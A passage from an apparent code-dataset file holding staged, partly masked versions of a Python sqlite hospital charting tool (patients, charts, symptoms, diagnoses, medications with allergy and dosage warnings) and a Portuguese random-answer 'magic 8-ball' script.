'exit' to leave): \")\n if select == 'exit':\n os.system('clear')\n return patientSelect(CONN, staff)\n selectChart = int(select) - 1\n chart_id = rows[selectChart][0]\n except:\n print('Invalid enry')\n return patientChart(CONN, staff, patient)\n if rows[selectChart][3] is None:\n editAble = 1\n else:\n editAble = 0\n return viewChart(CONN, chart_id, staff, patient, editAble)\n\n\ndef viewChart(CONN, chart_id, staff, patient, editAble):\n c = CONN.cursor()\n os.system('clear')\n print('Patient HCNO: ' + patient[0] + ', Patient Name: ' + patient[1])\n print('symptoms table')\n c.execute(\n \"\"\"SELECT * \n FROM symptoms \n WHERE hcno = ? AND chart_id = ?\n ORDER BY obs_date;\"\"\"\n , (patient[0], chart_id))\n rows = c.fetchall()\n for x in rows:\n print(x)\n print('diagnosis table')\n c.execute(\n \"\"\"SELECT * \n FROM diagnoses \n WHERE hcno = ? AND chart_id = ?\n ORDER BY ddate;\"\"\"\n , (patient[0], chart_id))\n rows = c.fetchall()\n for x in rows:\n print(x)\n print('medication table')\n c.execute(\n \"\"\"SELECT * \n FROM medications \n WHERE hcno = ? AND chart_id = ?\n ORDER BY mdate;\"\"\"\n , (patient[0], chart_id))\n rows = c.fetchall()\n for x in rows:\n print(x)\n if editAble == 0:\n input('Press any key to return: ')\n return patientChart(CONN, staff, patient)\n if staff[1] == 'D':\n return doctorChartMenu(CONN, patient, chart_id, staff)\n elif staff[1] == 'N':\n return nurseChartMenu(CONN, patient, chart_id, staff)\n\n\ndef doctorChartMenu(CONN, patient, chart_id, staff):\n print('==========Chart Menu==========')\n print('1. Add a symptoms')\n print('2. Add a Diagnosis')\n print('3. Add a medication')\n print('4. Exit')\n select = input('Please select an option to continue: ')\n if select == '1':\n print('Add symptoms')\n os.system('clear')\n return addSymptoms(CONN, patient, chart_id, staff)\n elif select == '2':\n print('Add Diagnosis')\n os.system('clear')\n return addDiagnosis(CONN, patient, chart_id, staff)\n elif select == '3':\n print('Add medication')\n os.system('clear')\n return addMedication(CONN, patient, chart_id, staff)\n elif select == '4':\n return patientChart(CONN, staff, patient)\n else:\n print('Invalid entry, please try again')\n return patientSelect(CONN, staff)\n\n\ndef nurseChartMenu(CONN, patient, chart_id, staff):\n print('Chart Menu')\n print('1. Add a symptoms')\n print('2. close chart')\n print('3. Exit')\n select = input('Please select an option to cintinue: ')\n if select == '1':\n os.system('clear')\n return addSymptoms(CONN, patient, chart_id, staff)\n elif select == '2':\n print('xx')\n return closeChart(CONN, patient, chart_id, staff)\n elif select == '3':\n return patientChart(CONN, staff, patient)\n else:\n print('Invalid, please try again')\n return patientSelect(CONN, staff)\n\n\ndef addSymptoms(CONN, patient, chart_id, staff):\n c = CONN.cursor()\n symptoms = input('Please enter a symptom: ')\n while len(symptoms) == 0:\n symptoms = input('Please enter a symptom: ')\n c.execute(\n \"\"\"INSERT INTO symptoms VALUES\n (?,?,?,DateTime('now','localtime'),?);\"\"\"\n , (patient[0], chart_id, staff[0], symptoms))\n CONN.commit()\n return viewChart(CONN, chart_id, staff, patient, 1)\n\n\ndef addDiagnosis(CONN, patient, chart_id, staff):\n c = CONN.cursor()\n diagnosis = input('Please enter a diagnosis: ')\n while len(diagnosis) == 0:\n diagnosis = input('Please enter a diagnosis: ')\n c.execute(\n \"\"\"INSERT INTO diagnoses VALUES\n (?,?,?,DateTime('now', 'localtime'),?);\"\"\"\n , (patient[0], chart_id, staff[0], diagnosis))\n CONN.commit()\n return viewChart(CONN, chart_id, staff, patient, 1)\n\n\ndef addMedication(CONN, patient, chart_id, staff):\n c = CONN.cursor()\n c.execute('SELECT * FROM patients WHERE hcno = ?;', (patient[0],))\n rows = c.fetchone()\n patientAge = rows[2]\n medicationName = input('Please enter a medication: ')\n c.execute(\n 'SELECT sug_amount FROM dosage WHERE drug_name = ? AND age_group = ?;',\n (medicationName, patientAge))\n dosageAmount = c.fetchone()\n if dosageAmount == None:\n print('Drug Name not exist')\n input('Press any key to return')\n return viewChart(CONN, chart_id, staff, patient, 1)\n c.execute('SELECT drug_name FROM reportedallergies WHERE hcno = ?;', (\n patient[0],))\n allergies = c.fetchone()\n for x in allergies:\n if x == medicationName:\n print('WARNING, the patinet is allergic to ' + x)\n c.execute('SELECT canbe_alg FROM inferredallergies WHERE alg = ?;', (\n medicationName,))\n inferallergies = c.fetchall()\n for x in inferallergies:\n print('Patinet can be allergic to: ' + x[0])\n amount = int(input('Medication amount: '))\n if amount > dosageAmount[0]:\n print('Suggest Amount: ' + str(dosageAmount[0]))\n confirm = input(\n 'WARNING: Prescibe Amount is greater than suggest amount.Confirm (y/n)'\n )\n if confirm == 'n':\n return viewChart(CONN, chart_id, staff, patient, 1)\n day = input('Medication length(in days): ')\n c.execute(\n \"\"\"INSERT INTO medications VALUES\n (?,?,?,DateTime('now', 'localtime'), DateTime('now','localtime'),DateTime('now',?,'localtime'),?,?);\"\"\"\n , (patient[0], chart_id, staff[0], '+' + day + ' day', amount,\n medicationName))\n CONN.commit()\n return viewChart(CONN, chart_id, staff, patient, 1)\n\n\ndef closeChart(CONN, patient, chart_id, staff):\n c = CONN.cursor()\n c.execute('SELECT * FROM charts WHERE chart_id = ?;', (chart_id,))\n rows = c.fetchone()\n if rows[3] is None:\n print('Close chart id ' + str(chart_id) + '?')\n print('1. Yes.')\n print('2. No.')\n result = input('Please enter your choice: ')\n if result == '1':\n print('Closing chart.')\n c.execute(\n \"\"\"UPDATE charts SET edate = DateTime('now','localtime')\n WHERE chart_id = ?;\"\"\"\n , (chart_id,))\n CONN.commit()\n return viewChart(CONN, chart_id, staff, patient, 1)\n elif result == '2':\n return viewChart(CONN, chart_id, staff, patient, 1)\n else:\n print('Invalid')\n return closeChart(CONN, patient, chart_id, staff)\n\n\ndef addPatient(CONN, staff):\n c = CONN.cursor()\n print('==========New Patient Record==========')\n name = input('Please enter patient name: ')\n hcno = input('Please enter patient HCNO: ')\n try:\n testHcno = int(hcno)\n except:\n print('Invalid HCNO, please try again')\n return addPatient(CONN, staff)\n age_group = input('Please enter age group: ')\n address = input('Please enter address: ')\n phone = input('Please enter phone number: ')\n emg_phone = input('Please enter emergency phone number: ')\n try:\n c.execute(\"\"\"INSERT INTO patients VALUES\n (?,?,?,?,?,?);\"\"\",\n (hcno, name, age_group, address, phone, emg_phone))\n CONN.commit()\n print('Patient record created.')\n except:\n print('Invalid entry, patient already exists')\n\n\ndef addChart(CONN, staff, patient):\n c = CONN.cursor()\n c.execute('SELECT chart_id FROM charts ORDER BY chart_id DESC LIMIT 1;')\n last_chart = c.fetchone()\n if last_chart[0] is not None:\n new_chart_id = int(last_chart[0]) + 1\n else:\n new_chart_id = '00001'\n c.execute(\n \"\"\"INSERT INTO charts VALUES\n (?,?, DateTime('now','localtime'), ?);\"\"\"\n , (new_chart_id, patient[0], None))\n c.execute(\n 'SELECT * FROM charts WHERE hcno = ? ORDER BY adate DESC LIMIT 1;',\n (patient[0],))\n CONN.commit()\n print('A new chart had been create. Chart ID: ' + str(new_chart_id))\n return patientChart(CONN, staff, patient)\n",
"step-4": "import sqlite3\nimport os\n\n\ndef patientSelect(CONN, staff):\n c = CONN.cursor()\n print('Search for Patient')\n select = input(\"Enter patient name(type 'exit' to leave): \")\n if select == 'exit':\n os.system('clear')\n return\n c.execute('SELECT hcno, name FROM patients WHERE name LIKE ?', ('%' +\n select + '%',))\n rows = c.fetchall()\n if len(rows) == 0:\n print('No patient found, please try again')\n return patientSelect(CONN, staff)\n count = 1\n for x in rows:\n print(str(count) + ': patient hcno ' + x[0] + '; patient name: ' + x[1]\n )\n count = count + 1\n try:\n select = input('Please select your patient: ')\n selectedPatient = int(select) - 1\n patientHCNO = rows[selectedPatient][0]\n patientName = rows[selectedPatient][1]\n patient = patientHCNO, patientName\n except:\n print('Invalid input, please try again')\n return patientSelect(CONN, staff)\n return patientChart(CONN, staff, patient)\n\n\ndef patientChart(CONN, staff, patient):\n c = CONN.cursor()\n os.system('clear')\n print('Patient HCNO: ' + patient[0] + ', Patient Name: ' + patient[1])\n c.execute(\n \"\"\"SELECT * \n FROM charts \n WHERE hcno = ?\n ORDER BY adate\n \"\"\"\n , (patient[0],))\n rows = c.fetchall()\n count = 1\n checkOpenChart = 0\n for x in rows:\n print(str(count) + ': chart id: ' + x[0] + '; patient hcno: ' + x[1\n ] + '; admission time: ' + x[2], end='')\n if x[3] is None:\n print(' discharge time: ' + 'Status: open.')\n checkOpenChart = checkOpenChart + 1\n else:\n print(' discharge time: ' + x[3] + 'Status: close.')\n count = count + 1\n if checkOpenChart == 0:\n print('No open chart')\n openChart = input('Do you want to create a new chart (y/n):')\n if openChart == 'y':\n print('Open chart')\n return addChart(CONN, staff, patient)\n else:\n print('')\n print(\n 'You have an open chart. If you want a new chart, close the open chart first'\n )\n try:\n select = input(\n \"Please select a chart to continue(type 'exit' to leave): \")\n if select == 'exit':\n os.system('clear')\n return patientSelect(CONN, staff)\n selectChart = int(select) - 1\n chart_id = rows[selectChart][0]\n except:\n print('Invalid enry')\n return patientChart(CONN, staff, patient)\n if rows[selectChart][3] is None:\n editAble = 1\n else:\n editAble = 0\n return viewChart(CONN, chart_id, staff, patient, editAble)\n\n\ndef viewChart(CONN, chart_id, staff, patient, editAble):\n c = CONN.cursor()\n os.system('clear')\n print('Patient HCNO: ' + patient[0] + ', Patient Name: ' + patient[1])\n print('symptoms table')\n c.execute(\n \"\"\"SELECT * \n FROM symptoms \n WHERE hcno = ? AND chart_id = ?\n ORDER BY obs_date;\"\"\"\n , (patient[0], chart_id))\n rows = c.fetchall()\n for x in rows:\n print(x)\n print('diagnosis table')\n c.execute(\n \"\"\"SELECT * \n FROM diagnoses \n WHERE hcno = ? AND chart_id = ?\n ORDER BY ddate;\"\"\"\n , (patient[0], chart_id))\n rows = c.fetchall()\n for x in rows:\n print(x)\n print('medication table')\n c.execute(\n \"\"\"SELECT * \n FROM medications \n WHERE hcno = ? AND chart_id = ?\n ORDER BY mdate;\"\"\"\n , (patient[0], chart_id))\n rows = c.fetchall()\n for x in rows:\n print(x)\n if editAble == 0:\n input('Press any key to return: ')\n return patientChart(CONN, staff, patient)\n if staff[1] == 'D':\n return doctorChartMenu(CONN, patient, chart_id, staff)\n elif staff[1] == 'N':\n return nurseChartMenu(CONN, patient, chart_id, staff)\n\n\ndef doctorChartMenu(CONN, patient, chart_id, staff):\n print('==========Chart Menu==========')\n print('1. Add a symptoms')\n print('2. Add a Diagnosis')\n print('3. Add a medication')\n print('4. Exit')\n select = input('Please select an option to continue: ')\n if select == '1':\n print('Add symptoms')\n os.system('clear')\n return addSymptoms(CONN, patient, chart_id, staff)\n elif select == '2':\n print('Add Diagnosis')\n os.system('clear')\n return addDiagnosis(CONN, patient, chart_id, staff)\n elif select == '3':\n print('Add medication')\n os.system('clear')\n return addMedication(CONN, patient, chart_id, staff)\n elif select == '4':\n return patientChart(CONN, staff, patient)\n else:\n print('Invalid entry, please try again')\n return patientSelect(CONN, staff)\n\n\ndef nurseChartMenu(CONN, patient, chart_id, staff):\n print('Chart Menu')\n print('1. Add a symptoms')\n print('2. close chart')\n print('3. Exit')\n select = input('Please select an option to cintinue: ')\n if select == '1':\n os.system('clear')\n return addSymptoms(CONN, patient, chart_id, staff)\n elif select == '2':\n print('xx')\n return closeChart(CONN, patient, chart_id, staff)\n elif select == '3':\n return patientChart(CONN, staff, patient)\n else:\n print('Invalid, please try again')\n return patientSelect(CONN, staff)\n\n\ndef addSymptoms(CONN, patient, chart_id, staff):\n c = CONN.cursor()\n symptoms = input('Please enter a symptom: ')\n while len(symptoms) == 0:\n symptoms = input('Please enter a symptom: ')\n c.execute(\n \"\"\"INSERT INTO symptoms VALUES\n (?,?,?,DateTime('now','localtime'),?);\"\"\"\n , (patient[0], chart_id, staff[0], symptoms))\n CONN.commit()\n return viewChart(CONN, chart_id, staff, patient, 1)\n\n\ndef addDiagnosis(CONN, patient, chart_id, staff):\n c = CONN.cursor()\n diagnosis = input('Please enter a diagnosis: ')\n while len(diagnosis) == 0:\n diagnosis = input('Please enter a diagnosis: ')\n c.execute(\n \"\"\"INSERT INTO diagnoses VALUES\n (?,?,?,DateTime('now', 'localtime'),?);\"\"\"\n , (patient[0], chart_id, staff[0], diagnosis))\n CONN.commit()\n return viewChart(CONN, chart_id, staff, patient, 1)\n\n\ndef addMedication(CONN, patient, chart_id, staff):\n c = CONN.cursor()\n c.execute('SELECT * FROM patients WHERE hcno = ?;', (patient[0],))\n rows = c.fetchone()\n patientAge = rows[2]\n medicationName = input('Please enter a medication: ')\n c.execute(\n 'SELECT sug_amount FROM dosage WHERE drug_name = ? AND age_group = ?;',\n (medicationName, patientAge))\n dosageAmount = c.fetchone()\n if dosageAmount == None:\n print('Drug Name not exist')\n input('Press any key to return')\n return viewChart(CONN, chart_id, staff, patient, 1)\n c.execute('SELECT drug_name FROM reportedallergies WHERE hcno = ?;', (\n patient[0],))\n allergies = c.fetchone()\n for x in allergies:\n if x == medicationName:\n print('WARNING, the patinet is allergic to ' + x)\n c.execute('SELECT canbe_alg FROM inferredallergies WHERE alg = ?;', (\n medicationName,))\n inferallergies = c.fetchall()\n for x in inferallergies:\n print('Patinet can be allergic to: ' + x[0])\n amount = int(input('Medication amount: '))\n if amount > dosageAmount[0]:\n print('Suggest Amount: ' + str(dosageAmount[0]))\n confirm = input(\n 'WARNING: Prescibe Amount is greater than suggest amount.Confirm (y/n)'\n )\n if confirm == 'n':\n return viewChart(CONN, chart_id, staff, patient, 1)\n day = input('Medication length(in days): ')\n c.execute(\n \"\"\"INSERT INTO medications VALUES\n (?,?,?,DateTime('now', 'localtime'), DateTime('now','localtime'),DateTime('now',?,'localtime'),?,?);\"\"\"\n , (patient[0], chart_id, staff[0], '+' + day + ' day', amount,\n medicationName))\n CONN.commit()\n return viewChart(CONN, chart_id, staff, patient, 1)\n\n\ndef closeChart(CONN, patient, chart_id, staff):\n c = CONN.cursor()\n c.execute('SELECT * FROM charts WHERE chart_id = ?;', (chart_id,))\n rows = c.fetchone()\n if rows[3] is None:\n print('Close chart id ' + str(chart_id) + '?')\n print('1. Yes.')\n print('2. No.')\n result = input('Please enter your choice: ')\n if result == '1':\n print('Closing chart.')\n c.execute(\n \"\"\"UPDATE charts SET edate = DateTime('now','localtime')\n WHERE chart_id = ?;\"\"\"\n , (chart_id,))\n CONN.commit()\n return viewChart(CONN, chart_id, staff, patient, 1)\n elif result == '2':\n return viewChart(CONN, chart_id, staff, patient, 1)\n else:\n print('Invalid')\n return closeChart(CONN, patient, chart_id, staff)\n\n\ndef addPatient(CONN, staff):\n c = CONN.cursor()\n print('==========New Patient Record==========')\n name = input('Please enter patient name: ')\n hcno = input('Please enter patient HCNO: ')\n try:\n testHcno = int(hcno)\n except:\n print('Invalid HCNO, please try again')\n return addPatient(CONN, staff)\n age_group = input('Please enter age group: ')\n address = input('Please enter address: ')\n phone = input('Please enter phone number: ')\n emg_phone = input('Please enter emergency phone number: ')\n try:\n c.execute(\"\"\"INSERT INTO patients VALUES\n (?,?,?,?,?,?);\"\"\",\n (hcno, name, age_group, address, phone, emg_phone))\n CONN.commit()\n print('Patient record created.')\n except:\n print('Invalid entry, patient already exists')\n\n\ndef addChart(CONN, staff, patient):\n c = CONN.cursor()\n c.execute('SELECT chart_id FROM charts ORDER BY chart_id DESC LIMIT 1;')\n last_chart = c.fetchone()\n if last_chart[0] is not None:\n new_chart_id = int(last_chart[0]) + 1\n else:\n new_chart_id = '00001'\n c.execute(\n \"\"\"INSERT INTO charts VALUES\n (?,?, DateTime('now','localtime'), ?);\"\"\"\n , (new_chart_id, patient[0], None))\n c.execute(\n 'SELECT * FROM charts WHERE hcno = ? ORDER BY adate DESC LIMIT 1;',\n (patient[0],))\n CONN.commit()\n print('A new chart had been create. Chart ID: ' + str(new_chart_id))\n return patientChart(CONN, staff, patient)\n",
"step-5": "import sqlite3\nimport os\n\n#Search for a patient name\n#Every doctor enter a name, it will find the patinet name that is similar to the patient name\n#Once a match is found, the system will output a list of matched patient names.\n#Then, the doctor select the patient to continue\ndef patientSelect(CONN, staff):\n c = CONN.cursor()\n print(\"Search for Patient\")\n select = input(\"Enter patient name(type 'exit' to leave): \")\n if select == 'exit':\n os.system('clear')\n #return doctorMenu(CONN, staff[0])\n return\n c.execute('''SELECT hcno, name FROM patients WHERE name LIKE ?''', ('%'+select+'%',))\n rows = c.fetchall()\n if len(rows) == 0: \n print(\"No patient found, please try again\")\n return patientSelect(CONN, staff)\n\n count = 1\n for x in rows:\n print(str(count)+\": patient hcno \"+x[0]+\"; patient name: \"+x[1])\n count = count + 1\n\n try:\n select = input(\"Please select your patient: \")\n selectedPatient = int(select)-1\n patientHCNO = rows[selectedPatient][0]\n patientName = rows[selectedPatient][1]\n patient = (patientHCNO, patientName)\n except:\n print(\"Invalid input, please try again\")\n return patientSelect(CONN, staff)\n return patientChart(CONN, staff, patient)\n\n\n#Output the tables related to the patient\n#The doctor can select an open chart to continue\ndef patientChart(CONN, staff, patient):\n c = CONN.cursor()\n os.system('clear')\n\n print(\"Patient HCNO: \" + patient[0] + \", Patient Name: \" + patient[1])\n c.execute('''SELECT * \n FROM charts \n WHERE hcno = ?\n ORDER BY adate\n ''', (patient[0],))\n rows = c.fetchall()\n count = 1\n checkOpenChart = 0\n for x in rows:\n print(str(count)+\": chart id: \"+x[0]+\"; patient hcno: \"+ x[1] + \"; admission time: \"+x[2], end=\"\")\n if x[3] is None:\n print(\" discharge time: \" + \"Status: open.\")\n checkOpenChart = checkOpenChart + 1\n else:\n print(\" discharge time: \" + x[3] + \"Status: close.\")\n count = count + 1;\n if checkOpenChart == 0:\n print(\"No open chart\")\n openChart = input(\"Do you want to create a new chart (y/n):\")\n if openChart == 'y':\n print(\"Open chart\")\n return addChart(CONN, staff, patient)\n else:\n print(\"\")\n print(\"You have an open chart. If you want a new chart, close the open chart first\")\n\n try:\n select = input(\"Please select a chart to continue(type 'exit' to leave): \")\n if select == 'exit':\n os.system('clear')\n return patientSelect(CONN, staff)\n selectChart = int(select)-1\n chart_id = rows[selectChart][0] \n except:\n print(\"Invalid enry\")\n return patientChart(CONN, staff, patient)\n\n if rows[selectChart][3] is None:\n editAble = 1\n else:\n editAble = 0\n\n return viewChart(CONN, chart_id, staff, patient, editAble)\n\n#View a list of charts that related to the patient\ndef viewChart(CONN, chart_id, staff, patient, editAble):\n c = CONN.cursor()\n os.system('clear')\n print(\"Patient HCNO: \" + patient[0] + \", Patient Name: \" + patient[1])\n print(\"symptoms table\")\n c.execute('''SELECT * \n FROM symptoms \n WHERE hcno = ? AND chart_id = ?\n ORDER BY obs_date;''', (patient[0], chart_id))\n rows = c.fetchall()\n for x in rows:\n print(x)\n print(\"diagnosis table\")\n c.execute('''SELECT * \n FROM diagnoses \n WHERE hcno = ? AND chart_id = ?\n ORDER BY ddate;''', (patient[0], chart_id))\n rows = c.fetchall()\n for x in rows:\n print(x)\n print(\"medication table\")\n c.execute('''SELECT * \n FROM medications \n WHERE hcno = ? AND chart_id = ?\n ORDER BY mdate;''', (patient[0], chart_id))\n rows = c.fetchall()\n for x in rows:\n print(x)\n\n if editAble == 0:\n input(\"Press any key to return: \")\n return patientChart(CONN, staff, patient)\n if staff[1] == 'D':\n return doctorChartMenu(CONN, patient, chart_id, staff)\n elif staff[1] == 'N':\n return nurseChartMenu(CONN, patient, chart_id, staff) \n\n#If the chart is open, able to edit the chart\ndef doctorChartMenu(CONN, patient, chart_id, staff):\n print(\"==========Chart Menu==========\")\n print(\"1. Add a symptoms\")\n print(\"2. Add a Diagnosis\")\n print(\"3. Add a medication\")\n print(\"4. Exit\")\n select = input(\"Please select an option to continue: \")\n if select == '1':\n print(\"Add symptoms\")\n os.system('clear')\n return addSymptoms(CONN, patient, chart_id, staff)\n elif select == '2':\n print(\"Add Diagnosis\")\n os.system('clear')\n return addDiagnosis(CONN, patient, chart_id, staff)\n elif select == '3':\n print(\"Add medication\")\n os.system('clear')\n return addMedication(CONN, patient, chart_id, staff)\n elif select == '4':\n return patientChart(CONN, staff, patient)\n else:\n print(\"Invalid entry, please try again\")\n return patientSelect(CONN, staff)\n\ndef nurseChartMenu(CONN, patient, chart_id, staff):\n print(\"Chart Menu\")\n print(\"1. Add a symptoms\")\n print(\"2. close chart\")\n print(\"3. Exit\")\n select = input(\"Please select an option to cintinue: \")\n\n if select == '1':\n os.system('clear')\n return addSymptoms(CONN, patient, chart_id, staff)\n elif select == '2':\n print(\"xx\")\n return closeChart(CONN, patient, chart_id, staff)\n elif select == '3':\n return patientChart(CONN, staff, patient)\n else:\n print(\"Invalid, please try again\")\n return patientSelect(CONN, staff)\n#Insert a symptom\n#Ask doctor for symptom name\n#Observer date will be current time\n# The function will return to viewChart()\ndef addSymptoms(CONN, patient, chart_id, staff):\n c = CONN.cursor()\n symptoms = input(\"Please enter a symptom: \")\n while len(symptoms) == 0:\n symptoms = input(\"Please enter a symptom: \")\n \n c.execute('''INSERT INTO symptoms VALUES\n (?,?,?,DateTime('now','localtime'),?);''',(patient[0], chart_id, staff[0], symptoms))\n CONN.commit()\n return viewChart(CONN, chart_id, staff, patient, 1)\n\n# Insert a diagnosis\n# Will prompt for a diagnose name\n# Observe date will be current time\n# Return to viewChart() after finish\ndef addDiagnosis(CONN, patient, chart_id, staff):\n #Insert a diagnosis\n c = CONN.cursor()\n diagnosis = input(\"Please enter a diagnosis: \")\n while len(diagnosis) == 0:\n diagnosis = input(\"Please enter a diagnosis: \")\n \n c.execute('''INSERT INTO diagnoses VALUES\n (?,?,?,DateTime('now', 'localtime'),?);''',(patient[0], chart_id, staff[0], diagnosis))\n CONN.commit()\n return viewChart(CONN, chart_id, staff, patient, 1)\n\n# Insert a medication\n# Will prompt for a medication name\n# start date will be today\n# Return to viewChart() after finish\ndef addMedication(CONN, patient, chart_id, staff):\n c = CONN.cursor()\n c.execute(\"SELECT * FROM patients WHERE hcno = ?;\",(patient[0],))\n rows = c.fetchone()\n patientAge = rows[2]\n\n #Get Medication Name, if not exist in database, return to previous page\n medicationName = input(\"Please enter a medication: \")\n c.execute(\"SELECT sug_amount FROM dosage WHERE drug_name = ? AND age_group = ?;\", (medicationName,patientAge))\n dosageAmount = c.fetchone()\n if dosageAmount == None:\n print(\"Drug Name not exist\")\n input(\"Press any key to return\")\n return viewChart(CONN, chart_id, staff, patient, 1)\n\n c.execute('''SELECT drug_name FROM reportedallergies WHERE hcno = ?;''', (patient[0],))\n allergies = c.fetchone()\n for x in allergies:\n if x == medicationName:\n print(\"WARNING, the patinet is allergic to \"+ x)\n c.execute('''SELECT canbe_alg FROM inferredallergies WHERE alg = ?;''',(medicationName,))\n \n inferallergies = c.fetchall()\n for x in inferallergies:\n print(\"Patinet can be allergic to: \" + x[0])\n\n # Get prescripbtion amount, if larger than suggest amount, display warning message\n amount = int(input(\"Medication amount: \"))\n if amount > dosageAmount[0]:\n print(\"Suggest Amount: \"+ str(dosageAmount[0]))\n confirm = input(\"WARNING: Prescibe Amount is greater than suggest amount.Confirm (y/n)\")\n\n if confirm == 'n':\n return viewChart(CONN, chart_id, staff, patient, 1)\n \n #Get medication period\n day = input(\"Medication length(in days): \")\n\n c.execute('''INSERT INTO medications VALUES\n (?,?,?,DateTime('now', 'localtime'), DateTime('now','localtime'),DateTime('now',?,'localtime'),?,?);''',(patient[0], chart_id, staff[0], '+'+day+' day', amount, medicationName))\n CONN.commit()\n return viewChart(CONN, chart_id, staff, patient, 1)\n\ndef closeChart(CONN, patient, chart_id, staff):\n c = CONN.cursor()\n c.execute(\"SELECT * FROM charts WHERE chart_id = ?;\", (chart_id,))\n rows = c.fetchone()\n\n if rows[3] is None:\n print(\"Close chart id \"+str(chart_id)+\"?\")\n print(\"1. Yes.\")\n print(\"2. No.\")\n result = input(\"Please enter your choice: \")\n if result == '1':\n print(\"Closing chart.\")\n c.execute('''UPDATE charts SET edate = DateTime('now','localtime')\n WHERE chart_id = ?;''', (chart_id,))\n CONN.commit()\n return viewChart(CONN, chart_id, staff, patient, 1)\n elif result == '2':\n return viewChart(CONN, chart_id, staff, patient, 1)\n else:\n print(\"Invalid\")\n return closeChart(CONN, patient, chart_id, staff)\n\ndef addPatient(CONN, staff):\n c = CONN.cursor()\n print(\"==========New Patient Record==========\")\n\n name = input(\"Please enter patient name: \")\n \n hcno = input(\"Please enter patient HCNO: \")\n try:\n testHcno = int(hcno)\n except:\n print(\"Invalid HCNO, please try again\")\n return addPatient(CONN, staff)\n age_group = input(\"Please enter age group: \")\n address = input(\"Please enter address: \")\n phone = input(\"Please enter phone number: \")\n emg_phone = input(\"Please enter emergency phone number: \")\n try:\n c.execute('''INSERT INTO patients VALUES\n (?,?,?,?,?,?);''',(hcno, name, age_group, address, phone, emg_phone))\n CONN.commit()\n print(\"Patient record created.\")\n except:\n print(\"Invalid entry, patient already exists\")\n\ndef addChart(CONN, staff, patient):\n c = CONN.cursor()\n #phcno = input(\"Please enter patient health care #: \")\n c.execute(\"SELECT chart_id FROM charts ORDER BY chart_id DESC LIMIT 1;\")\n last_chart = c.fetchone()\n if last_chart[0] is not None:\n new_chart_id = int(last_chart[0])+1\n else:\n new_chart_id = '00001'\n\n c.execute('''INSERT INTO charts VALUES\n (?,?, DateTime('now','localtime'), ?);''', (new_chart_id, patient[0], None))\n c.execute(\"SELECT * FROM charts WHERE hcno = ? ORDER BY adate DESC LIMIT 1;\", (patient[0],))\n CONN.commit()\n\n print(\"A new chart had been create. Chart ID: \"+ str(new_chart_id))\n return patientChart(CONN, staff, patient)\n",
"step-ids": [
7,
9,
11,
12,
13
]
}
|
[
7,
9,
11,
12,
13
] |
from random import randint
#funções
def leialetra():
'''
=>Função para validar letras.
parm=msg: Recebe dados to tipo string sendo Ss ou Nn.
return: String de valor S.
'''
while True:
try:
msg = str(input('Deseja fazer uma pergunta? [s/n] ')).upper()[0]
except KeyboardInterrupt:
print('O usuário desistiu de inserir um dado!')
break
except IndexError:
print('ERRO, nada digitado!')
else:
if msg not in 'SsNn' or msg in ' ':
print('ERRO, DADO INVALIDO!')
else:
if msg in 'Nn':
print('Volte sempre, Obrigado!')
break
else:
return 'S'
break
def facapergunta():
msg = str(input('Faça sua pergunta: ')).upper().strip().replace(' ','')
if msg.isnumeric():
return 'N'
else:
return 'L'
#programa principal
resposta = ["Sim", "Não", "Talvez", "Por que não?", "Vá", "Não sei", "Pode ser", "Talvez sim", "Talvez não", "Tenha Fé"]
while True:
aleatorio = randint(0, 9)
escolha = leialetra()
if escolha == 'S':
pergunta = facapergunta()
if pergunta == 'L':
print(resposta[aleatorio])
else:
break
|
normal
|
{
"blob_id": "1fff681363c4c91c47c2818681a3f2f125dd8c83",
"index": 2022,
"step-1": "<mask token>\n\n\ndef leialetra():\n \"\"\"\n =>Função para validar letras.\n parm=msg: Recebe dados to tipo string sendo Ss ou Nn.\n return: String de valor S.\n \"\"\"\n while True:\n try:\n msg = str(input('Deseja fazer uma pergunta? [s/n] ')).upper()[0]\n except KeyboardInterrupt:\n print('O usuário desistiu de inserir um dado!')\n break\n except IndexError:\n print('ERRO, nada digitado!')\n else:\n if msg not in 'SsNn' or msg in ' ':\n print('ERRO, DADO INVALIDO!')\n elif msg in 'Nn':\n print('Volte sempre, Obrigado!')\n break\n else:\n return 'S'\n break\n\n\ndef facapergunta():\n msg = str(input('Faça sua pergunta: ')).upper().strip().replace(' ', '')\n if msg.isnumeric():\n return 'N'\n else:\n return 'L'\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef leialetra():\n \"\"\"\n =>Função para validar letras.\n parm=msg: Recebe dados to tipo string sendo Ss ou Nn.\n return: String de valor S.\n \"\"\"\n while True:\n try:\n msg = str(input('Deseja fazer uma pergunta? [s/n] ')).upper()[0]\n except KeyboardInterrupt:\n print('O usuário desistiu de inserir um dado!')\n break\n except IndexError:\n print('ERRO, nada digitado!')\n else:\n if msg not in 'SsNn' or msg in ' ':\n print('ERRO, DADO INVALIDO!')\n elif msg in 'Nn':\n print('Volte sempre, Obrigado!')\n break\n else:\n return 'S'\n break\n\n\ndef facapergunta():\n msg = str(input('Faça sua pergunta: ')).upper().strip().replace(' ', '')\n if msg.isnumeric():\n return 'N'\n else:\n return 'L'\n\n\n<mask token>\nwhile True:\n aleatorio = randint(0, 9)\n escolha = leialetra()\n if escolha == 'S':\n pergunta = facapergunta()\n if pergunta == 'L':\n print(resposta[aleatorio])\n else:\n break\n",
"step-3": "<mask token>\n\n\ndef leialetra():\n \"\"\"\n =>Função para validar letras.\n parm=msg: Recebe dados to tipo string sendo Ss ou Nn.\n return: String de valor S.\n \"\"\"\n while True:\n try:\n msg = str(input('Deseja fazer uma pergunta? [s/n] ')).upper()[0]\n except KeyboardInterrupt:\n print('O usuário desistiu de inserir um dado!')\n break\n except IndexError:\n print('ERRO, nada digitado!')\n else:\n if msg not in 'SsNn' or msg in ' ':\n print('ERRO, DADO INVALIDO!')\n elif msg in 'Nn':\n print('Volte sempre, Obrigado!')\n break\n else:\n return 'S'\n break\n\n\ndef facapergunta():\n msg = str(input('Faça sua pergunta: ')).upper().strip().replace(' ', '')\n if msg.isnumeric():\n return 'N'\n else:\n return 'L'\n\n\nresposta = ['Sim', 'Não', 'Talvez', 'Por que não?', 'Vá', 'Não sei',\n 'Pode ser', 'Talvez sim', 'Talvez não', 'Tenha Fé']\nwhile True:\n aleatorio = randint(0, 9)\n escolha = leialetra()\n if escolha == 'S':\n pergunta = facapergunta()\n if pergunta == 'L':\n print(resposta[aleatorio])\n else:\n break\n",
